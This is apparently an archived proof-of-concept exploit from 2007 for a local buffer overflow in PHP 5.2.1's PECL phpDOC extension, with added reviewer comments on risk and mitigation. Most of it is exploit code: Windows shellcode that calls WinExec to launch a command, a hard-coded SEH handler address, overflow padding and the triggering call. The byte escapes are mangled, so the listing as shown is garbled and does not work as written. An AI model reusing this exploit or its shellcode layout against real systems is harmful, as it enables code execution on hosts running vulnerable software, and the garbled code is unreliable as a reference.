
# Title : PHP 5.2.1 with PECL phpDOC Local Buffer Overflow Exploit
# Published : 2007-03-25
# Author : rgod


<?php
//PHP 5.2.1 with PECL phpDOC confirm_phpdoc_compiled() local buffer overflow poc exploit
//WIN 2K SP3 version / seh overwrite method
//to be launched from the cli

// by rgod
// site: http://retrogod.altervista.org

// Reviewer notes (defensive reading of this listing):
//  - Risk: a script that can call confirm_phpdoc_compiled() with an oversized
//    string argument crashes the interpreter and, on the stated target, redirects
//    execution via an overwritten SEH record. Any code path that lets untrusted
//    input reach this function is therefore a code-execution risk in the PHP
//    process's context. The exact buffer size and copy routine are not visible
//    here; the ~1393-byte padding below only suggests the overflow distance —
//    TODO confirm against the extension source.
//  - Mitigation: do not load this PECL extension on shared or exposed hosts;
//    PHP 5.2.x and Windows 2000 are long end-of-life. Modern PHP builds and
//    Windows releases with SafeSEH/DEP/ASLR would be expected to reject the
//    hard-coded handler address used below.
//  - NOTE(review): the "\x" escape prefixes in the byte strings look like they
//    were lost when this page was extracted ("xebx1b" is a literal six-character
//    string here, not two bytes), so the lengths computed below differ from the
//    author's intended layout and the listing does not run as-is.

// Refuse to run unless the vulnerable extension is actually present.
if (!extension_loaded("phpDOC")){
die("you need the phpDOC extension loaded.");
}


// Payload string handed to the vulnerable function. The author's own comments
// mark the two kernel32 addresses it references (WinExec, ExitProcess); the
// trailing text is the command passed to WinExec. See the note above about
// the missing "\x" prefixes.
$____scode=
"xebx1b".
"x5b".
"x31xc0".
"x50".
"x31xc0".
"x88x43x59".
"x53".
"xbbxcax73xe9x77". //WinExec
"xffxd3".
"x31xc0".
"x50".
"xbbx5cxcfxe9x77". //ExitProcess
"xffxd3".
"xe8xe0xffxffxff".
"x63x6dx64".
"x2e".
"x65".
"x78x65".
"x20x2f".
"x63x20".
"start notepad & ";

//eip & ecx set to the same value ...
// Hard-coded, build-specific kernel32.dll address (WIN 2K SP3 per the header);
// it is what a SafeSEH-aware loader would refuse to dispatch to.
$eip="x47x30xE9x77";//0x77E93047      pop ECX - pop - retbis kernel32.dll
//and further (junk...) inc edi, xor cl ch, *ja short* 
//should work on sp4 if you find an usable address
// Layout as written: padding up to 1393 bytes with the payload at the end,
// then 30 bytes of filler, the handler address, and 12 more bytes of filler.
// (With the "\x" prefixes lost, each "x90" is three characters, so the actual
// offsets produced by this listing are not the intended ones.)
$____suntzu=str_repeat("x90",1393 - strlen($____scode)).$____scode.str_repeat("x90",30).$eip.str_repeat("x90",12);
// The call that triggers the overflow: a single oversized string argument.
confirm_phpdoc_compiled($____suntzu);

?>
